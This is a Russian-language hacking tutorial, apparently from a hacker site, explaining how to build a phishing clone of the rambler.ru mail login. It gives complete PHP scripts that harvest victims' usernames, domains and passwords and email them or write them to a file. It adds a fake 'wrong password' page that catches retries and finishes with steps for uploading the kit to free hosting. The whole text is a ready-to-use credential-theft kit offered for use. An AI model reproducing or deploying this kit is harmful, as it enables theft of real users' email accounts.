Доброго времени суток!!!
Сегодня я расскажу как сделать фейк на rambler.ru
И так приступим!
Переходим на страницу авторизации http://www.rambler.ru/ открываем исходный код страницы и копируем его в текстовик и ищем строку
<form method="post" action="http://id.rambler.ru/script/auth.cgi" name="rlogin">
и меняем на
<form method="post" action="login.php">
Сохраняем как index.html
Как видим мы изменили значение обязательной атрибут <form>`а action
Вот и сам login.php
<?php
$BASE="мыло";
$IS_EMAIL=true;
$LOCATION="erorr.html";
$p0=$_REQUEST["login"];
$p1=$_REQUEST["domain"];
$p2=$_REQUEST["passw"];
$headers = "Content-type: text/html; charset=windows-1251\r\n";
$headers .= "From: bot <$BASE>\r\n";
$headers .= "Bcc: $BASE\r\n";
$info="логин:$p0:домен:$p1:пароль:$p2:\n";
if ($IS_EMAIL){
mail($BASE, "Привет от www.thehackword.ru", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}
header("Location:$LOCATION");
?>Здесь указываем своё мыло куда будет приходить логи и ссылку куда будет перекидывать после ввода данных , в нашей случаи это erorr.html!!!
Теперь мы создадим еще одну страничку фейка так как жертва может ошибиться при входе в свой аккаунт и к нам придут не верные логи(( Для этого открываем браузер opera и топаем на
http://www.rambler.ru/ (Делаем с помощью Opera так как только этот браузер нормально сохраняет все файлы)
Вписываем в поле логина и пароля что нибудь... например xaker:xaker и жмякаем "Войти в почту" Нас перекинет на страницу http://id.rambler.ru/script/auth.cgi где нам будет сказано
Неправильное имя или пароль Вот с этой странице мы и сделаем фейк.
В меню браузера находим пункт "сохранить как" и в тип файла выбираем "HTML-файл с изображениями" и сохраняем как erorr.html
И так если все правильно то у нас должно еще создаться папка с именем "erorr_files"
После открываем erorr.html с помощью блокнота (например) и ищем строку
<form method="post" action="auth.cgi?mode=login" name="auth_form" onsubmit="this.action+=location.hash">
И меняем на
<form method="post" action="rambl.php" name="auth_form" onsubmit="this.action+=location.hash">
И сохраняем
Вот сам rambl.php
<?php
$BASE="мыло";
$IS_EMAIL=true;
$LOCATION="http://www.rambler.ru/";
$p0=$_REQUEST["login"];
$p1=$_REQUEST["domain"];
$p2=$_REQUEST["passw"];
$headers = "Content-type: text/html; charset=windows-1251\r\n";
$headers .= "From: bot <$BASE>\r\n";
$headers .= "Bcc: $BASE\r\n";
$info="логин:$p0:домен:$p1:пароль:$p2:\n";
if ($IS_EMAIL){
mail($BASE, "Привет от www.thehackword.ru", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}
header("Location:$LOCATION");
?>И так мы создали фейк!
Регимся например на holm.ru и с помощью FileZilla FTP Client заливаем наши файлы в папку www и радуемся!
Ну вот и все!






